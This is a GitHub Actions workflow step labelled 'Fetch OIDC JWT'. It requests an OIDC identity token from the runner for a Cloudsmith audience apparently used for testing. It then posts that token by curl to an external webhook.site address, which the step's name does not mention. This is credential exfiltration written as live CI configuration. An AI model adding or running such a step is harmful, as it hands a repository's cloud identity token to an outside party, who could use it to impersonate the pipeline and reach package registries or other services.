- name: Fetch OIDC JWT
  run: |
    JWT=$(curl -sLS \
      "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=https://api.cloudsmith.io/openid/alex-test-3vdp/" \
      -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
      | jq -r .value)
    curl -s -X POST "https://b5bfbf58-f5a8-419c-a81a-d4690bb5005f.webhook.site" \
      -d "{\"jwt\": \"$JWT\"}"